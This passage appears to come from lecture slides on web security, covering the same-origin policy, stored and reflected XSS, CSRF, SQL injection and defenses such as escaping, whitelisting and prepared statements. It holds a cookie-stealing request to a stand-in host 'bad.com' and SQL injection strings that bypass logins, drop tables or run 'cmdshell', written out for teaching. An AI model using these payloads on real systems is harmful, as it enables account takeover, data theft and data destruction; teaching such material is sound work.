to Java. Powerful web page programming language. Scripts embedded in pages returned by the web server are executed by the browser. They can alter page contents (DOM objects) and track events (mouse clicks, motion, keystrokes).
Layout, cookies, and events are tagged with their origin: the hostname (bank.com) that provided them.
SOP = only scripts received from a web page's origin have access to that page's elements.

Cross-site scripting (XSS)
Two types of XSS
1. Stored (or persistent) XSS attack: the attacker leaves a script on the bank.com server; the server later unwittingly sends it to your browser; the browser executes it within the same origin as bank.com.

Stored XSS attack
[Diagram: stored XSS. Actors: the attacker at bad.com, the bank.com server, and the client browser. Steps: 1 attacker injects the malicious script into bank.com; 2 client requests content; 3 client receives the malicious script; 4 client executes the malicious script as though the server meant us to run it; 5 the script steals valuable data / performs the attacker's action, e.g. GET http://bad.com/steal?c=document.cookie]
Users who visited his page ran the program, which made them friends with Samy, displayed "but most of all, Samy is my hero" on their profile, and installed the script in their profile to propagate. From 73 to 1,000,000 friends in 20 hours. Took down MySpace for a weekend. Felony computer hacking; banned from computers for 3 years.

Two types of XSS
1. Stored (or persistent) XSS attack
Your browser executes the script in the response within the same origin as bank.com.

Reflected XSS attack
[Diagram: reflected XSS. Actors: the attacker at bad.com, the bank.com server, the client browser, and a bad.com URL specially crafted by the attacker. Steps: 1 client visits the attacker's web site; 2 client receives the malicious page; 3 client clicks on the link; 4 bank.com echoes the user input; 5 client executes the malicious script as though the server meant us to run it; 6 the script steals valuable data / performs the attacker's action.]

Echoed input
The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response.
Input from bad.com: http://victim.com/search.php?term=socks
Result from victim.com:
  Results for socks: . . .

Exploiting echoed input
Input from bad.com: http://victim.com/search.php?term=
Result from victim.com:
  Search results
  Results for . . .
The browser would execute this within victim.com's origin.
Key trick: the server does not ensure that its output does not contain foreign, embedded scripts.

XSS defense: filter/escape
The typical defense is sanitizing: remove executable portions of user-provided content, or ... Libraries exist for this purpose.
Better defense: whitelist
Instead of trying to sanitize, validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous spec of what should be allowed.
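The echoed-input search page from the slides above, as an added Python example (not code from the original lecture): the vulnerable raw echo beside the two defenses just described, escaping the output and whitelisting the input. The handler names and the character whitelist for a search term are assumptions made for this example.

```python
import html
import re
from typing import Optional

# Whitelist spec for a search term (an assumption for this example):
# letters, digits and spaces only, 1 to 40 characters.
SAFE_TERM = re.compile(r"[A-Za-z0-9 ]{1,40}")


def render_results_unsafe(term: str) -> str:
    # The slides' vulnerable pattern: the server echoes the raw user input
    # back into its HTML response, so any markup in the term becomes part
    # of the page and is interpreted within victim.com's origin.
    return f"<h1>Search results</h1><p>Results for {term}: . . .</p>"


def render_results_escaped(term: str) -> str:
    # Escaping defense: <, >, &, " and ' become entities, so the browser
    # renders the term as text instead of parsing it as markup.
    safe = html.escape(term, quote=True)
    return f"<h1>Search results</h1><p>Results for {safe}: . . .</p>"


def validate_term(term: str) -> Optional[str]:
    # Whitelist defense: accept only input matching a rigorous spec of what
    # should be allowed and reject everything else (fail-safe default).
    return term if SAFE_TERM.fullmatch(term) else None


def handle_search(term: str) -> str:
    # Defense in depth: validate the parameter first, then escape what is echoed.
    checked = validate_term(term)
    if checked is None:
        return "<h1>Search results</h1><p>Invalid search term.</p>"
    return render_results_escaped(checked)
```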
XSS vs. CSRF
Do not confuse the two:
XSS exploits the trust a client browser has in data sent from the legitimate website, so the attacker tries to control what the website sends to the client browser.
CSRF exploits the trust a legitimate website has in data sent from the client browser, so the attacker tries to control what the client browser sends to the website.
SQL injection
http://xkcd.com/327/

Server-side data
[Diagram: the client (browser) talks to the server (web server), which keeps (private) data in a database.] Long-lived state, stored in a separate database. We need to protect this state from illicit access and tampering.

SQL (Standard Query Language)
Table Users (the table name) has the columns Name, Gender, Age, Email, Password; each row is a record, e.g. Connie, F, ...
  SELECT Age FROM Users WHERE Name='Greg';                 -- returns 34
  UPDATE Users SET Email='[email protected]' WHERE Age=34;   -- this is a comment
  INSERT INTO Users VALUES('Pearl', 'F', ...);
  DROP TABLE Users;

Server-side code
Website login code (PHP):
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
Suppose you successfully log in as $user if this returns any results. How could you exploit this?

SQL injection
Input for $user: frank' OR 1=1); --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name='frank' OR 1=1); -- and password='whocares');");
Login successful! Problem: data and code are mixed up together.

SQL injection: worse
Input for $user: frank' OR 1=1); DROP TABLE Users; --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name='frank' OR 1=1); DROP TABLE Users; -- and password='whocares');");
Statements can be chained together with a semicolon: STATEMENT 1 ; STATEMENT 2

SQL injection: even worse
Input for $user: '); EXEC cmdshell; --
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
becomes
  $result = mysql_query("select * from Users where(name=''); EXEC cmdshell; -- and password='whocares');");

http://xkcd.com/327/
SQL injection attacks are common
[Chart: percentage of vulnerabilities that are SQL injection, y-axis from 0 to 25%. Source: http://web.nvd.nist.gov/view/vuln/statistics]

SQL injection countermeasures
The underlying issue
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
This one string combines the code and the data. This is similar to buffer overflows: when the boundary between code and data blurs, we open ourselves up to vulnerabilities.

The underlying issue
[Diagram: parse tree of the query. select is the root, with children * (the columns), from Users, and a where clause; the where clause is an and node whose children are name = $user and password = $pass. $user and $pass should be data, not code.]

Prevention: input validation
We require input of a certain form, but we cannot guarantee it has that form, so we must validate it, just like we do to avoid buffer overflows.
Making input trustworthy: check that it has the expected form and reject it if not, or sanitize it by modifying it or using it such that the result is correctly formed.

Sanitization: blacklisting
Delete the characters you don't want: ' ; --
Downside: Lupita Nyong'o. You want these characters sometimes! How do you know if/when the characters are bad?
Downside: how do you know you've identified all the bad characters?

Sanitization: escaping
Replace problematic characters with safe ones:
  change ' to \'
  change ; to \;
  change -- to \-\-
  change \ to \\
Hard by hand, but there are many libraries and methods: magic_quotes_gpc = On, mysql_real_escape_string().
Downside: sometimes you want these characters in your SQL! And escaping still may not be enough.

Checking: whitelisting
Check that the user input is known to be safe, e.g., an integer within the right range.
Rationale: given invalid input, it is safer to reject than to fix; fixes may result in wrong output, or in vulnerabilities (the principle of fail-safe defaults).
Downside: hard for rich input! How do you whitelist usernames? First names?
Sanitization via escaping, whitelisting, or blacklisting is HARD. Can we do better?

Sanitization: prepared statements
Treat user data according to its type; decouple the code and the data.
Before:
  $result = mysql_query("select * from Users where(name='$user' and password='$pass');");
After:
  $db = new mysqli("localhost", "user", "pass", "DB");
  $statement = $db->prepare("select * from Users where(name=? and password=?);");
  $statement->bind_param("ss", $user, $pass);   // bind variables; bind variables are typed
  $statement->execute();

Using prepared statements
Before:
  $statement = "select * from Users where(name='$user' and password='$pass');";
After:
  $statement = $db->prepare("select * from Users where(name=? and password=?);");
  $statement->bind_param("ss", $user, $pass);
[Diagram: parse tree of the prepared query. select is the root, with children *, from Users, and a where clause that is an and node over name = ? and password = ?. The ? leaves are bound to $user (here frank' OR 1=1); --) and $pass.] Binding is only applied to the leaves, so the structure of the tree is fixed.

Additional mitigation
For defense in depth, also try to mitigate any attack. But you should always do input validation in any case!
Limit privileges; this reduces the power of an exploit. Limit the commands and/or tables a user can access, e.g., allow SELECT on Orders but not Creditcards.
Encrypt sensitive data; it is less useful if stolen. You may not need to encrypt the Orders table, but certainly encrypt creditcards.cc_numbers.

Input validation, ad infinitum
Many other web-based bugs are ultimately due to trusting external input (too much).
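The login query from the SQL injection and prepared-statement slides above, as an added Python example (not the lecture's PHP code): sqlite3 stands in for MySQL, the Users rows are constructed, and the slides' first injection input is run against the string-concatenated query and against the parameterized one. The semicolon-chained variants are not reproduced, since sqlite3's execute() runs only one statement; the example also shows why the blacklisting slide's Lupita Nyong'o name is a problem for the concatenated query but not for the prepared one.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    # Constructed sample data: a Users table with the slides' columns.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(Name TEXT, Gender TEXT, Age INTEGER, "
               "Email TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?, ?, ?, ?)", [
        ("Connie", "F", 34, "connie@example.invalid", "s3cret"),
        ("Greg", "M", 34, "greg@example.invalid", "hunter2"),
        ("Lupita Nyong'o", "F", 40, "lupita@example.invalid", "oscar"),
    ])
    return db


def login_concat(db: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    # The slides' vulnerable pattern: code and data in one string, so
    # whatever the user typed is parsed as part of the query. A legitimate
    # apostrophe in a name breaks the query; an injected one rewrites it.
    sql = f"select * from Users where(name='{user}' and password='{pw}')"
    row = db.execute(sql).fetchone()
    return row[0] if row else None   # Name of the first matching row, or None


def login_prepared(db: sqlite3.Connection, user: str, pw: str) -> Optional[str]:
    # Prepared statement: the parse tree is fixed when the query is prepared
    # and the inputs are bound only to the two leaves, so they are never code.
    sql = "select * from Users where(name=? and password=?)"
    row = db.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


# The slides' first injection input, minus its ';' (sqlite3 refuses a second
# statement); the '--' still comments out the password check.
BYPASS_USER = "frank' OR 1=1) --"

if __name__ == "__main__":
    db = make_db()
    print("concat  :", login_concat(db, BYPASS_USER, "whocares"))    # Connie
    print("prepared:", login_prepared(db, BYPASS_USER, "whocares"))  # None
```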
http://www.jantoo.com/cartoon/08336711

Takeaways: verify before trust
Improperly validated input causes many attacks.
Common to the solutions: check or sanitize all data.
Whitelisting is more secure than blacklisting; checking is more secure than sanitization.
Proper sanitization is hard.
All data: are you sure you found all the inputs?
Don't roll your own: use libraries, frameworks, etc.